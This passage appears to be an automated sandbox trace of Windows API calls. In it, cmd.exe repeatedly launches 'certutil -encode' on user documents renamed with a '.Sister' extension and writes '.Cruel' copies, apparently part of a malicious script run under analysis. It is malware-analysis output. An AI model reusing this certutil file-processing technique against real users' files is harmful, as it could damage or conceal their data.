_BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0306.662] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0306.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.662] GetFileType (hFile=0x50) returned 0x2 [0306.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.662] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0306.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.662] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0306.663] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.663] GetFileType (hFile=0x50) returned 0x2 [0306.663] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.663] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0306.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.664] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d32640*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d32640*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0306.664] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"0H3WME_tqNVE6XV UFW.docx.Sister\" \"0H3WME_tqNVE6XV UFW.docx.Cruel\" ") returned 76 [0306.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.664] GetFileType (hFile=0x50) returned 0x2 [0306.664] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.664] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0306.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.665] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x4c, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x4c) returned 1 [0306.665] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0306.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.665] GetFileType (hFile=0x50) returned 0x2 [0306.665] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.665] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0306.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.667] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0306.672] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.672] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0306.672] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0306.672] malloc (_Size=0xffce) returned 0x21eda3bfa80 [0306.673] ??_V@YAXPEAX@Z () returned 0x21eda3bfa80 [0306.673] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0306.673] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0306.673] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0306.673] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0306.673] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0306.673] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0306.673] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0306.673] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0306.673] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0306.673] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0306.673] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0306.673] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0306.673] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0306.673] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0306.673] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0306.673] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0306.673] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0306.673] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0306.673] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0306.673] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0306.673] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0306.673] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0306.673] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0306.673] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0306.674] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0306.674] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0306.674] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0306.674] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0306.674] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0306.674] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0306.674] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0306.674] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0306.674] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0306.674] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0306.674] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0306.674] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0306.674] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0306.674] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0306.674] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0306.674] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0306.674] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0306.674] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0306.674] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0306.674] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0306.674] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0306.674] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0306.674] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0306.674] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0306.674] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0306.674] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0306.674] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0306.679] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0306.679] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0306.679] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0306.679] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0306.679] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0306.679] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0306.679] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0306.679] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0306.679] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0306.679] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0306.679] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0306.679] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0306.679] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0306.679] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0306.679] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0306.679] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0306.680] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0306.680] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0306.680] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0306.680] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0306.680] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0306.680] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0306.680] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0306.680] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0306.680] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0306.680] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0306.680] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0306.680] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0306.680] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0306.680] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0306.680] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0306.680] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0306.680] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0306.680] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0306.680] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0306.680] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0306.680] ??_V@YAXPEAX@Z () returned 0x1 [0306.680] GetProcessHeap () returned 0x21ed8c70000 [0306.680] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8c96f40 [0306.682] GetProcessHeap () returned 0x21ed8c70000 [0306.682] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xba) returned 0x21ed8d6a620 [0306.682] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0306.682] malloc (_Size=0xffce) returned 0x21eda3bfa80 [0306.682] ??_V@YAXPEAX@Z () returned 0x21eda3bfa80 [0306.682] GetProcessHeap () returned 0x21ed8c70000 [0306.682] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9380080 [0306.686] SetErrorMode (uMode=0x0) returned 0x0 [0306.686] SetErrorMode (uMode=0x1) returned 0x0 [0306.686] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9380090, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0xa6cf4fdb80*="Documents") returned 0x19 [0306.686] SetErrorMode (uMode=0x0) returned 0x1 [0306.686] GetProcessHeap () returned 0x21ed8c70000 [0306.686] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9380080, Size=0x56) returned 0x21ed9380080 [0306.686] GetProcessHeap () returned 0x21ed8c70000 [0306.686] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9380080) returned 0x56 [0306.686] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0306.686] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0306.686] GetProcessHeap () returned 0x21ed8c70000 [0306.687] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c0) returned 0x21ed8d64dd0 [0306.687] GetProcessHeap () returned 0x21ed8c70000 [0306.687] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x370) returned 0x21ed8d43b70 [0306.687] GetProcessHeap () returned 0x21ed8c70000 [0306.687] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d43b70, Size=0x1c2) returned 0x21ed8d644c0 [0306.687] GetProcessHeap () returned 0x21ed8c70000 [0306.687] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d644c0) returned 0x1c2 [0306.687] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0306.687] GetProcessHeap () returned 0x21ed8c70000 [0306.687] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d61f40 [0306.687] GetProcessHeap () returned 0x21ed8c70000 [0306.688] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61f40, Size=0x7e) returned 0x21ed8d61f40 [0306.688] GetProcessHeap () returned 0x21ed8c70000 [0306.688] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61f40) returned 0x7e [0306.688] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.688] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0306.689] GetLastError () returned 0x2 [0306.689] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.689] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0306.690] GetLastError () returned 0x2 [0306.690] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.690] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0306.690] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0306.691] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0306.691] GetLastError () returned 0x2 [0306.691] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0306.691] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0306.691] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0306.691] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0306.691] ??_V@YAXPEAX@Z () returned 0x1 [0306.691] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.695] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0306.695] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0306.695] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0306.695] GetProcessHeap () returned 0x21ed8c70000 [0306.695] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45cb0 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0306.696] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0306.697] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0306.697] GetProcessHeap () returned 0x21ed8c70000 [0306.697] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45cb0) returned 1 [0306.697] GetProcessHeap () returned 0x21ed8c70000 [0306.697] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95740 [0306.697] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0306.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.698] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0306.698] _get_osfhandle (_FileHandle=0) returned 0x4c [0306.698] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0306.698] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"0H3WME_tqNVE6XV UFW.docx.Sister\" \"0H3WME_tqNVE6XV UFW.docx.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Documents", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"0H3WME_tqNVE6XV UFW.docx.Sister\" \"0H3WME_tqNVE6XV UFW.docx.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"0H3WME_tqNVE6XV UFW.docx.Sister\" \"0H3WME_tqNVE6XV UFW.docx.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x1038, dwThreadId=0x1050)) returned 1 [0306.908] CloseHandle (hObject=0xa8) returned 1 [0306.908] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0306.908] GetProcessHeap () returned 0x21ed8c70000 [0306.908] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0306.908] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0306.908] GetProcessHeap () returned 0x21ed8c70000 [0306.908] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed9980080 [0306.908] FreeEnvironmentStringsA (penv="=") returned 1 [0306.909] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0307.449] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0307.449] CloseHandle (hObject=0xa4) returned 1 [0307.449] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0307.449] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0307.449] GetProcessHeap () returned 0x21ed8c70000 [0307.449] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0307.449] GetEnvironmentStringsW () returned 0x21ed9980080* [0307.449] GetProcessHeap () returned 0x21ed8c70000 [0307.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed8d603e0 [0307.450] FreeEnvironmentStringsA (penv="=") returned 1 [0307.450] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0307.450] GetProcessHeap () returned 0x21ed8c70000 [0307.450] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0307.450] GetEnvironmentStringsW () returned 0x21ed8d603e0* [0307.450] GetProcessHeap () returned 0x21ed8c70000 [0307.450] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed9980080 [0307.450] FreeEnvironmentStringsA (penv="=") returned 1 [0307.450] GetProcessHeap () returned 0x21ed8c70000 [0307.451] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95740) returned 1 [0307.451] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0307.451] ??_V@YAXPEAX@Z () returned 0x1 [0307.451] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192b1c40, ftCreationTime.dwHighDateTime=0x1d5e90d, ftLastAccessTime.dwLowDateTime=0xae74540, ftLastAccessTime.dwHighDateTime=0x1d5ead5, ftLastWriteTime.dwLowDateTime=0xae74540, ftLastWriteTime.dwHighDateTime=0x1d5ead5, nFileSizeHigh=0x0, nFileSizeLow=0x1670b, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="21UCEaK S0K_31H.pptx.Sister", cAlternateFileName="")) returned 1 [0307.452] GetProcessHeap () returned 0x21ed8c70000 [0307.452] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75e40, Size=0x96) returned 0x21ed8d63ae0 [0307.452] GetProcessHeap () returned 0x21ed8c70000 [0307.452] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63ae0) returned 0x96 [0307.452] GetProcessHeap () returned 0x21ed8c70000 [0307.452] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0307.452] GetProcessHeap () returned 0x21ed8c70000 [0307.452] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379db0, Size=0x58) returned 0x21ed9379db0 [0307.452] GetProcessHeap () returned 0x21ed8c70000 [0307.452] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9379db0) returned 0x58 [0307.452] GetProcessHeap () returned 0x21ed8c70000 [0307.452] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379e20 [0307.452] malloc (_Size=0x1ff9c) returned 0x21eda3bfa80 [0307.454] GetProcessHeap () returned 0x21ed8c70000 [0307.454] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7bda0 [0307.454] ??_V@YAXPEAX@Z () returned 0x1 [0307.454] malloc (_Size=0x1ff9c) returned 0x21eda3bfa80 [0307.454] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6cb3bab, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0307.454] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0307.455] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: 